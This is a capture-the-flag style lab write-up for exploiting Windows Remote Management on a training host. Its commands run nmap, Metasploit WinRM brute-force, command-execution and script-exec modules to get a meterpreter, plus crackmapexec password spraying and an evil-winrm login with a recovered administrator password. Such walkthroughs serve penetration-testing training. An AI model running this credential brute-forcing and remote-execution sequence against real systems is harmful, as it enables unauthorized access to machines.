WinRM: Exploitation with Metasploit

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Your task is to fingerprint the WinRM service using the tools available on the Kali machine and then exploit the vulnerability using the Metasploit framework exploit and auxiliary modules.

Objective: Exploit the WinRM service to get a meterpreter on the target and retrieve the flag!

Tools

• Metasploit Framework

• Nmap

Writeup

nmap -sSVC demo.ine.local

Metasploit

msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set PASSWORD anything
exploit

use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS demo.ine.local
exploit

use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit

use exploit/windows/winrm/winrm_script_exec
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit

Alternativa

crackmapexec winrm demo.ine.local -u /usr/share/wordlists/metasploit/common_users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt --continue-on-success | grep "+"

evil-winrm -i demo.ine.local -u administrator -p tinkerbell